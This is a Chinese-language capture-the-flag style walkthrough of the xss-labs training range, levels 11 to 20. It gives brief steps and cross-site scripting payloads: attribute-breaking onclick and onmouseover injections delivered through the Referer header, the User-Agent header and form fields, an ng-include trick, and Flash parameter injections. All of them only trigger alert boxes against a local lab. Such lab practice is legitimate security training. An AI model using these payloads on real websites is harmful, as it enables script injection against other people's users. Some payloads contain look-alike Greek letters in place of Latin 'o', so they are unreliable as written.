xss-labs靶场通关详解
Less-11
1、使用burp suite抓包
2、在数据包中添加Referer='" type='text' οnclick='alert(123)'
3点击forward,页面出现搜索框,点击搜索框,即可出现弹窗
Less-12
1、使用burp suite抓包
2、将UA头写入点击事件'" type='text' οnclick='alert(123)'
3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗
Less-13
1、使用burp suite抓包
2、在user处写入点击事件'" type='text' οnclick='alert(123)'
3、点击forward,页面出现搜索框,点击搜索框,即可出现弹窗
Less-14
文件地址失效,无法进行测试
Less-15
1、查看页面源码,发现有一个被注释掉的nginclude信息
2、使用ng-include引用外部html文件?src='./level1.php'
发现引入了第一关的php文件
3、点击f12 在图片标签里添加一个点击事件 οnclick='alert(1)'
当我们点击图片时 就会出现弹窗
Less-16
1、打开页面源代码
2、在src后添加οnclick="alert(1)" ,点击图片出现弹窗
Less-17
1、页面输入οnmοuseοver=javascript:alert(1),鼠标移到不支持此插件上
Less-18
1、页面输入οnmοuseοver=alert("1"),鼠标移到不支持此插件上
Less-19
1、本题需要使用flash插件
2、页面输入http://127.0.0.1/xss/level19.php?arg01=version&arg02=<a href="javascript:alert(/xss/)">xss</a>,访问后点击xss即可出现弹窗
Less-20
1、本题依旧需要flash插件
2、页面输入php?arg01=id&arg02=xss\"))}catch(e){alert(/xss/)}//%26width=123%26height=123
访问直接弹窗
